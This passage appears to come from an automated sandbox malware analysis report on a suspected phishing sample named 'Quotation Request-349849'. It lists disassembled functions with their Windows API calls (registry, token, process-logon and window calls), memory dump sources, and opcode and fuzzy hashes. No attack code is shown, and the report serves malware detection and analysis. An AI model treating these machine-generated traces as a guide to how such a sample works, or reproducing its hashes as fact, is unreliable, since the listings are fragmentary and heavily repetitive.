                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                      • String ID: Msctls_Progress32
                                                      • API String ID: 1025951953-3636473452
                                                      • Opcode ID: ce02034c2eda31ff65708db0c762cab60c9c4ad11415dd8ac5dfee83c6e6b7bf
                                                      • Instruction ID: af833f32e7b6df60164c89ad84008d2626ccbf9e4e399a9cb7072bbac995e78e
                                                      • Opcode Fuzzy Hash: ce02034c2eda31ff65708db0c762cab60c9c4ad11415dd8ac5dfee83c6e6b7bf
                                                      • Instruction Fuzzy Hash: 4B11B6B1150219BFEF159F64CC85EE77F6DFF08798F014115BA04A2050C7729C25DBA4
                                                      Function 007F9AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __init_pointers.LIBCMT ref: 007F9AE6
                                                        • Part of subcall function 007F3187: EncodePointer.KERNEL32(00000000), ref: 007F318A
                                                        • Part of subcall function 007F3187: __initp_misc_winsig.LIBCMT ref: 007F31A5
                                                        • Part of subcall function 007F3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 007F9EA0
                                                        • Part of subcall function 007F3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 007F9EB4
                                                        • Part of subcall function 007F3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 007F9EC7
                                                        • Part of subcall function 007F3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 007F9EDA
                                                        • Part of subcall function 007F3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 007F9EED
                                                        • Part of subcall function 007F3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 007F9F00
                                                        • Part of subcall function 007F3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 007F9F13
                                                        • Part of subcall function 007F3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 007F9F26
                                                        • Part of subcall function 007F3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 007F9F39
                                                        • Part of subcall function 007F3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 007F9F4C
                                                        • Part of subcall function 007F3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 007F9F5F
                                                        • Part of subcall function 007F3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 007F9F72
                                                        • Part of subcall function 007F3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 007F9F85
                                                        • Part of subcall function 007F3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 007F9F98
                                                        • Part of subcall function 007F3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 007F9FAB
                                                        • Part of subcall function 007F3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 007F9FBE
                                                      • __mtinitlocks.LIBCMT ref: 007F9AEB
                                                      • __mtterm.LIBCMT ref: 007F9AF4
                                                        • Part of subcall function 007F9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,007F9AF9,007F7CD0,0088A0B8,00000014), ref: 007F9C56
                                                        • Part of subcall function 007F9B5C: _free.LIBCMT ref: 007F9C5D
                                                        • Part of subcall function 007F9B5C: DeleteCriticalSection.KERNEL32(0088EC00,?,?,007F9AF9,007F7CD0,0088A0B8,00000014), ref: 007F9C7F
                                                      • __calloc_crt.LIBCMT ref: 007F9B19
                                                      • __initptd.LIBCMT ref: 007F9B3B
                                                      • GetCurrentThreadId.KERNEL32 ref: 007F9B42
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                      • String ID:
                                                      • API String ID: 3567560977-0
                                                      • Opcode ID: fc797e97c4fab096ab346bffd834b8b94d1d39c316d6f78230816f5519253f21
                                                      • Instruction ID: 87822536288df4978d4c6f982b287deb68bfaaba4538a79f33358d34bb365319
                                                      • Opcode Fuzzy Hash: fc797e97c4fab096ab346bffd834b8b94d1d39c316d6f78230816f5519253f21
                                                      • Instruction Fuzzy Hash: 48F09672619719A9E67477787C0BB7A3A90AF02734F20461AF764C53D6FF5888414261
                                                      Function 007F406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,007F3F85), ref: 007F4085
                                                      • GetProcAddress.KERNEL32(00000000), ref: 007F408C
                                                      • EncodePointer.KERNEL32(00000000), ref: 007F4097
                                                      • DecodePointer.KERNEL32(007F3F85), ref: 007F40B2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                      • String ID: RoUninitialize$combase.dll
                                                      • API String ID: 3489934621-2819208100
                                                      • Opcode ID: 04daacec7f68edf057bf8e08bf2dac1efdf3bee7f594c2b7813608b07517c0ab
                                                      • Instruction ID: de7949e74cc3a822c17c3d7f2fc95c61d0062d5e54aa7ac1ed8188661da15d5c
                                                      • Opcode Fuzzy Hash: 04daacec7f68edf057bf8e08bf2dac1efdf3bee7f594c2b7813608b07517c0ab
                                                      • Instruction Fuzzy Hash: BCE0B670581704EFEB20BF61EC0DB563AA5B704783F14406AF215E12B1CFBE4604CA14
                                                      Function 008364B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _memmove$__itow__swprintf
                                                      • String ID:
                                                      • API String ID: 3253778849-0
                                                      • Opcode ID: 24132d38f82a37ab7f3bdb1bcae677fd77bf2f02b632f77fef73ae5b321cb7ec
                                                      • Instruction ID: 391882657eca446a581bfaafbbfec16b1511587d3b3d9c8ea1830c362bb2e67f
                                                      • Opcode Fuzzy Hash: 24132d38f82a37ab7f3bdb1bcae677fd77bf2f02b632f77fef73ae5b321cb7ec
                                                      • Instruction Fuzzy Hash: 72619F3190065AEBCF01EF68CC86AFE37A5FF95308F048519F9559B292EB389815DB90
                                                      Function 008501E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007D7DE1: _memmove.LIBCMT ref: 007D7E22
                                                        • Part of subcall function 00850E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0084FDAD,?,?), ref: 00850E31
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008502BD
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008502FD
                                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00850320
                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00850349
                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0085038C
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00850399
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                      • String ID:
                                                      • API String ID: 4046560759-0
                                                      • Opcode ID: b5bd9311edbe6df4a2c7e9c00198fc112905ebf56bb53e6d067e9e2cdb69d42d
                                                      • Instruction ID: 4f79c62d08d84ff17f58cd686b7c395a49d8d06b8fbb6841fad67684c74e03e7
                                                      • Opcode Fuzzy Hash: b5bd9311edbe6df4a2c7e9c00198fc112905ebf56bb53e6d067e9e2cdb69d42d
                                                      • Instruction Fuzzy Hash: 71513871208204EFC715EF64C849EAEBBA9FF84314F04491DF955872A2DB35E909CB52
                                                      Function 00855799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetMenu.USER32(?), ref: 008557FB
                                                      • GetMenuItemCount.USER32(00000000), ref: 00855832
                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0085585A
                                                      • GetMenuItemID.USER32(?,?), ref: 008558C9
                                                      • GetSubMenu.USER32(?,?), ref: 008558D7
                                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 00855928
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Menu$Item$CountMessagePostString
                                                      • String ID:
                                                      • API String ID: 650687236-0
                                                      • Opcode ID: adf264cd1fcb672076fa75adc97a198b75ad052570407437bfcfe79fcb55c869
                                                      • Instruction ID: af8508fe935316f5446c11d58b2774eb6251518d1c71cd538f620e8ea7947adb
                                                      • Opcode Fuzzy Hash: adf264cd1fcb672076fa75adc97a198b75ad052570407437bfcfe79fcb55c869
                                                      • Instruction Fuzzy Hash: 71515A35E00619EFCF01AF64C855AAEBBB4FF48321F144069ED11EB352CB38AE419B90
                                                      Function 0082EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 0082EF06
                                                      • VariantClear.OLEAUT32(00000013), ref: 0082EF78
                                                      • VariantClear.OLEAUT32(00000000), ref: 0082EFD3
                                                      • _memmove.LIBCMT ref: 0082EFFD
                                                      • VariantClear.OLEAUT32(?), ref: 0082F04A
                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0082F078
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Variant$Clear$ChangeInitType_memmove
                                                      • String ID:
                                                      • API String ID: 1101466143-0
                                                      • Opcode ID: af52c403f3513ca0c9fa0c87cd296821cdf7b37a4479622d9f57ef311faa94b8
                                                      • Instruction ID: e89e82bde79ec9a47b2504c1190000643356632855ce8320c355f894ca2b4a12
                                                      • Opcode Fuzzy Hash: af52c403f3513ca0c9fa0c87cd296821cdf7b37a4479622d9f57ef311faa94b8
                                                      • Instruction Fuzzy Hash: 5A516CB5A00219DFCB10DF58D884AAAB7F8FF4C314B158569EA49DB302E334E951CFA0
                                                      Function 0083220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00832258
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008322A3
                                                      • IsMenu.USER32(00000000), ref: 008322C3
                                                      • CreatePopupMenu.USER32 ref: 008322F7
                                                      • GetMenuItemCount.USER32(000000FF), ref: 00832355
                                                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00832386
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                      • String ID:
                                                      • API String ID: 3311875123-0
                                                      • Opcode ID: 761668f0e25565e96cb356657cf3196ef913a72aae257ad5bc8731d2c241b10f
                                                      • Instruction ID: 0c130f02b911f6016b8339f77d43f89fd1757559d97731336563f4e5466e6236
                                                      • Opcode Fuzzy Hash: 761668f0e25565e96cb356657cf3196ef913a72aae257ad5bc8731d2c241b10f
                                                      • Instruction Fuzzy Hash: 25519C70601209EBDF21DF68D888BAEBBF5FF85318F104169E851E72A1D3799944CB91
                                                      Function 007D1765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623
                                                      • BeginPaint.USER32(?,?,?,?,?,?), ref: 007D179A
                                                      • GetWindowRect.USER32(?,?), ref: 007D17FE
                                                      • ScreenToClient.USER32(?,?), ref: 007D181B
                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 007D182C
                                                      • EndPaint.USER32(?,?), ref: 007D1876
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                      • String ID:
                                                      • API String ID: 1827037458-0
                                                      • Opcode ID: a840d76267d14137f00142e1ad901c35ffd6607d05d4c240d39827bc4c60ac30
                                                      • Instruction ID: 3cb36c631489b3961a2544a2407ca7b09a8463ca99b6d12800f4d6f5231ffa3d
                                                      • Opcode Fuzzy Hash: a840d76267d14137f00142e1ad901c35ffd6607d05d4c240d39827bc4c60ac30
                                                      • Instruction Fuzzy Hash: F6417E30504700AFD711EF25CC84BAA7BF8FB59724F14467AFAA4872B2C7359845DB61
                                                      Function 0085B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ShowWindow.USER32(008957B0,00000000,01544C48,?,?,008957B0,?,0085B5A8,?,?), ref: 0085B712
                                                      • EnableWindow.USER32(00000000,00000000), ref: 0085B736
                                                      • ShowWindow.USER32(008957B0,00000000,01544C48,?,?,008957B0,?,0085B5A8,?,?), ref: 0085B796
                                                      • ShowWindow.USER32(00000000,00000004,?,0085B5A8,?,?), ref: 0085B7A8
                                                      • EnableWindow.USER32(00000000,00000001), ref: 0085B7CC
                                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0085B7EF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Window$Show$Enable$MessageSend
                                                      • String ID:
                                                      • API String ID: 642888154-0
                                                      • Opcode ID: d407ec2985903c13f34bc186cdce49a45b5451e1c3a41fe0937719a5efdbb334
                                                      • Instruction ID: a13e2a230507936268402e70aaac456cd14df5ada37ef36b84457a3787d7d755
                                                      • Opcode Fuzzy Hash: d407ec2985903c13f34bc186cdce49a45b5451e1c3a41fe0937719a5efdbb334
                                                      • Instruction Fuzzy Hash: C9416134600244AFDB26CF24C499B957BE1FF59312F1881B9FE48CF6A2C731A85ACB51
                                                      Function 0084709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,00844E41,?,?,00000000,00000001), ref: 008470AC
                                                        • Part of subcall function 008439A0: GetWindowRect.USER32(?,?), ref: 008439B3
                                                      • GetDesktopWindow.USER32 ref: 008470D6
                                                      • GetWindowRect.USER32(00000000), ref: 008470DD
                                                      • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0084710F
                                                        • Part of subcall function 00835244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008352BC
                                                      • GetCursorPos.USER32(?), ref: 0084713B
                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00847199
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                      • String ID:
                                                      • API String ID: 4137160315-0
                                                      • Opcode ID: b7eb86a3b33b02d788045a3c9c854ba50b02b511498e817e9e32ebe7693c7f7d
                                                      • Instruction ID: 8ba7b894243f6b519a4846f5304e7dc4948ffbe90678c1e2e25bb235b4fe882b
                                                      • Opcode Fuzzy Hash: b7eb86a3b33b02d788045a3c9c854ba50b02b511498e817e9e32ebe7693c7f7d
                                                      • Instruction Fuzzy Hash: 3A318172509309ABD720DF14D849A9BBBEAFB88314F000919F585E7192D775EA09CB92
                                                      Function 00828879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 008280A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008280C0
                                                        • Part of subcall function 008280A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008280CA
                                                        • Part of subcall function 008280A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008280D9
                                                        • Part of subcall function 008280A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 008280E0
                                                        • Part of subcall function 008280A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008280F6
                                                      • GetLengthSid.ADVAPI32(?,00000000,0082842F), ref: 008288CA
                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 008288D6
                                                      • HeapAlloc.KERNEL32(00000000), ref: 008288DD
                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 008288F6
                                                      • GetProcessHeap.KERNEL32(00000000,00000000,0082842F), ref: 0082890A
                                                      • HeapFree.KERNEL32(00000000), ref: 00828911
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                      • String ID:
                                                      • API String ID: 3008561057-0
                                                      • Opcode ID: b8d634d2cba916d8afbc1fe23f3f2e80e80a95e1b042f09b691e103c0fbafc47
                                                      • Instruction ID: d2e68d0617af4d8df37cc61664b3b5b1f6eda522b21c594ca7e1f77c8b1c2886
                                                      • Opcode Fuzzy Hash: b8d634d2cba916d8afbc1fe23f3f2e80e80a95e1b042f09b691e103c0fbafc47
                                                      • Instruction Fuzzy Hash: 9B11B171502619FFDF119FA4EC09BBE7BA8FB44316F148028E945D7211CB369D84DB60
                                                      Function 008285B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 008285E2
                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 008285E9
                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 008285F8
                                                      • CloseHandle.KERNEL32(00000004), ref: 00828603
                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00828632
                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00828646
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                      • String ID:
                                                      • API String ID: 1413079979-0
                                                      • Opcode ID: 240221ce1924fc5bd29fcc5cc841d899a6108eaff637dbd7ebb4978efb611334
                                                      • Instruction ID: 23f8380029eaa72fb4b91fe366a15d5ddba310d5aba6110add42cafba7236fdc
                                                      • Opcode Fuzzy Hash: 240221ce1924fc5bd29fcc5cc841d899a6108eaff637dbd7ebb4978efb611334
                                                      • Instruction Fuzzy Hash: C71147B2501249EBDF018FA4ED49BDA7BA9FB08305F044064FE04A21A1C7769DA0AB60
                                                      Function 0082B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDC.USER32(00000000), ref: 0082B7B5
                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 0082B7C6
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0082B7CD
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0082B7D5
                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0082B7EC
                                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 0082B7FE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
